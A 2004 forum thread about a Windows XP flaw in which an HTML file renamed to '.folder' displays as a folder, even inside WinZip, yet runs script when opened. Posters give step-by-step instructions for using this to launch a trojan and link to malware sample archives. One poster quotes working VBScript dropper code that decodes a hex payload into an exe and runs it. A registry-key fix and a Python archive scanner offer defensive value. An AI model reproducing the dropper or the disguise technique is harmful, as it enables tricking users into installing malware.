zero-maitimax
ppl new exploit in xp


If you change an HTML file to .folder, XP will change the icon to a folder.

But

if you double-click on it, it opens as HTML. You can put JavaScript in the HTML that executes an exe file.

The exploit is very high because programs like WinZip see it as a folder.



Some JavaScript:
http://www.malware.com/exe-cute-html.zip


boshcash
I don't understand what you are saying, but I think these are oldies.
usanet21
Yeah man, agreed... I can't understand what he is saying.
zero-maitimax, can you please tell me step by step how to change an HTML file and write a JavaScript to execute an exe file? Sorry, I really don't understand.
zero-maitimax
OK.


Well, you just make an HTML file with JavaScript in it, and in the JavaScript you put an exe file (trojan).

Now you change the .html to .folder.


Now the icon changes into a folder icon.


But if you double-click on the folder it opens the original HTML file

and executes the exe (trojan).



If you pack this folder in WinZip you still see a folder icon, even in WinZip, but again, if you double-click on it, it will execute the original HTML file.
sysadmin
Hello zero-maitimax,

I tried it out with WinZip 8.0 and it works like you said!!

WinZip works with that file like a "folder" and executes it, just within a trojan.

Bye, sysadmin
zero-maitimax
Thanks, you have tried it.


I'm good.
EXPLOiTED
OK, that makes sense. But what exe are you gonna exec? I hope OSes don't come with premade trojans on them. Would that mean you have to get the trojan you want to exec on their system as well?
sysadmin
QUOTE (zero-maitimax @ Jan 26 2004, 02:28 PM)
Thanks, you have tried it.


I'm good.

Hey zero-maitimax,

you are so goooood!!!

Bye, sysadmin
zero-maitimax
some more info
http://lists.netsys.com/pipermail/full-dis...-January/016115. html

example (TrojanDropper.JS.Mimail.b)
http://www.malware.com/my.pics.zip
sysadmin
QUOTE (zero-maitimax @ Jan 26 2004, 02:50 PM)
some more info
http://lists.netsys.com/pipermail/full-dis...-January/016115. html

Hello zero-maitimax,

This link does not match.

Bye, sysadmin
larsbruggie
I was so n00b that I opened illmob's my picture.folder , now I am infected
sysadmin
Hello larsbruggie,

Next time it's better to "read" the posts.

Bye, sysadmin
zero-maitimax
http://lists.netsys.com/pipermail/full-dis...ary/016115.html


larsbruggie, I'm sorry for you.



I found more stuff:


.dvd
.audiocd
.mapimail
.mydocs


The solution I found is to delete HKEY_CLASSES_ROOT/.folder (I don't know if it is wrong, but the exploit doesn't exist anymore on my machine).

hdlgp
I tried this exploit and it works.
T3cHn0b0y
It does indeed! I'm deleting that regkey right now! Thnx 4 the info m8!
boshcash
OK, it works fine, but what are the extra privileges that I gain when the user runs the HTML file locally? It's like sending an HTML link if no extra privileges are found.

Note: for this exploit to work, the HTML file must contain the <html> tag, else it won't work.
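
A defender-side check for the trick discussed in this thread, as an added example that is not part of any post: it scans a ZIP archive for members whose names end in the extensions listed above and reports whether their first bytes contain HTML or script markup. The function names, the marker list and the sample archive are assumptions constructed for illustration.

```python
import io
import zipfile

# Extensions named in this thread as showing a folder-style icon.
SPOOF_EXTS = (".folder", ".dvd", ".audiocd", ".mapimail", ".mydocs")
# Markup that shows the member is really HTML/script content (assumed marker list).
MARKERS = (b"<html", b"<script")


def suspicious_entries(zip_bytes, sniff=4096):
    """Return (name, reason) for members that look like folders but are files."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            # A genuine directory entry ends in "/" and is not the trick.
            if info.is_dir() or not name.lower().endswith(SPOOF_EXTS):
                continue
            with zf.open(info) as fh:
                head = fh.read(sniff).lower()
            found = [m.decode() for m in MARKERS if m in head]
            reason = "markup: " + ",".join(found) if found else "spoofable extension"
            hits.append((name, reason))
    return hits


def build_sample():
    """Constructed sample archive holding inert text only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("archive.folder/", "")            # real directory: ignored
        zf.writestr("archive.folder/readme.txt", "plain text")
        zf.writestr("My pics.folder", "<HTML><body>inert sample</body></HTML>")
        zf.writestr("notes.mydocs", "no markup here")
        zf.writestr("page.html", "<html></html>")     # honest extension: ignored
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in suspicious_entries(build_sample()):
        print(f"{name}: {reason}")
```

A mail or download gateway could quarantine any archive for which this returns a "markup" hit; the "spoofable extension" hits are lower confidence and worth logging.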
m0t0ro
Can anyone tell me what's the effect of executing the 'My pics.folder' script?

Thanks.
m0t0ro
what I mean is what is the malware.exe file?
Yorn
CODE
<title>malware.com</title>

<script language=vbs>

self.MoveTo 6000,6000


tmp = Split(t, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
Set shell = CreateObject("WScript.Shell")
poop = "fDfdfsdsfsdfssd3s343.exe"
Set f = fso.CreateTextFile(poop, ForWriting)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
 r = Int("&H" & Mid(tmp(i), 3, l))
 For j = 1 To r
 f.Write Chr(b)
 Next
Else
 f.Write Chr(b)
End If
Next
f.Close
runscr=1
if runscr then shell.run(poop)
on error resume next: self.close()
</script>
chris105
QUOTE (zero-maitimax @ Jan 26 2004, 02:19 PM)
oke


wel you justed make a html file with jave script in it.. and in the jave script you put a exe file (trojan)

now you change the .html to .folder


now the icoon change in to a folder icoon..


but if you dubbel klik on the folder it open de orignaal html file..

and excute the exe(trojan)



if you pack this folder in winzip you still see a folder icoon even in winzip .. but again if you dubbel klik on it will excute the origanaal html file

Right a "dubbel klik" "origanal" talk straight
m0t0ro
can anybody explain how to execute some other hexadecimal code of some binary file?

Thanks!
aiboforcen
Does anyone know what extension a folder in Win2k has?